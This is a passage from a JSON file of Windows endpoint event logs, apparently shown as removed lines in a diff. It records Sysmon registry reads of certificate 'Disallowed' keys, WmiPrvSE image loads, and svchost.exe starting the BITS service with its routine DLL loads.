"unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "CORPerfMonExt.dll", - "image_path": 
"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CORPerfMonExt.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - 
"timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\System32\\msvcr120_clr0400.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573456200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bitsperf.dll", - "image_path": "C:\\Windows\\System32\\bitsperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456509984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 6868, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883573456770000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, 
- { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456670000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - 
"image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", 
- "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "qmgr.dll", - "image_path": "C:\\Windows\\System32\\qmgr.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": 
"C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "bitsperf.dll", - "image_path": "C:\\Windows\\System32\\bitsperf.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "FirewallAPI.dll", - "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "esent.dll", - "image_path": "C:\\Windows\\System32\\esent.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "fwbase.dll", - "image_path": "C:\\Windows\\System32\\fwbase.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, - "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6868, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573456830000, 
